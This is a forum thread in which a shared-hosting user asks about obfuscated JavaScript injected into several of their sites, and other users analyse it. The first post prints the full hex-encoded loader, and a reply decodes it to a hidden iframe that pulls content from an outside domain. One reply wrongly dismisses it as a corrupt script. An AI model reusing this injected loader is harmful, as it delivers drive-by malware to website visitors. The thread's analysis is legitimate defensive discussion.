PDA

View Full Version : [other] Found strange javascript code on multiple domains on my shared host



s0c0
February 3rd, 2010, 03:58 AM
I found the following javascript on multiple domains on my shared hosting account. I've removed any remnants I could find. I just noticed this the other day. I am definitely going to change my passwords, but I was wondering if anyone has seen anything like this before:



<script>c46d278='';r935ebef290=document;r935ebef290.write( '<scr'+'ipt>function r4569f8(rf5689){return e'+c46d278+'val(rf5689); }</scr'+'ipt>'); function c461134c94r570039(r9fcf87c5e9){ var d5e7='';return (r4569f8('p'+d5e7+'arseInt')(r9fcf87c5e9,16));}fun ction rcb3e7ac446d(r9e84868f){ function ra8e2732(){var rd81c7eb9a71=2;return rd81c7eb9a71;} var r12ae09a5cda='';r6791d='fromCh';r587192=String[r6791d+'arCode'];for(r8a86e310237=0;r8a86e310237<r9e84868f.length;r8a86e310237+=ra8e2732()){ r12ae09a5cda+=(r587192(c461134c94r570039(r9e84868f .substr(r8a86e310237,ra8e2732()))));}return r12ae09a5cda;} var r9f0e9628='3C7363726970743E69662821'+c46d278+'6D79 6961'+c46d278+'297B646F63756D656E742E7772697465287 56E65736361'+c46d278+'7065282027253363253639253636 253732253631'+c46d278+'253664253635253230253665253 631'+c46d278+'253664253635253364253633253334253336 25323025373325373225363325336425323725363825373425 3734253730253361'+c46d278+'25326625326625373425363 52537322536392537332537342536662537322536392536652 53633253265253633253666253664253266253734253733253 26625363925366525326525363325363725363925336625363 32536662536342536392536652625323725326225346425363 1'+c46d278+'25373425363825326525373225366625373525 3665253634253238253464253631'+c46d278+'25373425363 8253265253732253631'+c46d278+'25366525363425366625 3664253238253239253261'+c46d278+'25333625333025333 82533342532392532622532372533332532372532302537372 53639253634253734253638253364253331'+c46d278+'2533 35253336253230253638253635253639253637253638253734 25336425333325333925323025373325373425373925366325 36352533642532372537362536392537332536392536322536 39253663253639253734253739253361'+c46d278+'2536382 53639253634253634253635253665253237253365253363253 266253639253636253732253631'+c46d278+'253664253635 2533652729293B7D7661'+c46d278+'72206D796961'+c46d2 78+'3D747275653B3C2F7363726970743E';r935ebef290.wr ite(rcb3e7ac446d(r9f0e9628));</script><script>check_content()</script>


I know javascript, but I'm not devious like this. It looks very nasty though.

The Cog
February 3rd, 2010, 04:23 PM
I think it ends up writing something like this into the document:


<iframe name=c46 src='http://teristorinc.com/ts/in.cgi?codin&'+Math.round(Math.random()*6084)+'3' width=156 height=39 style='visibility:hidden'></iframe>

unspawn
February 3rd, 2010, 07:37 PM
I've removed any remnants I could find.
What you did was patch symptoms, not fix the cause. You might be running vulnerable, unpatched software versions or there might be an infected website management client unknowingly tainting uploaded files or server configuration might be set too lax or anything else along those lines.

*Raz0r*
February 6th, 2010, 02:36 AM
It doesn't look like a security vulnerability really but instead more like an outdated script with a file that might be corrupt.

The Cog
February 7th, 2010, 01:15 AM
No it's a heavily obfuscated script, that loads a hidden iframe from another server. I presume that the server is a compromised one that serves browser busting malware. The script is up to no good, and should not be there.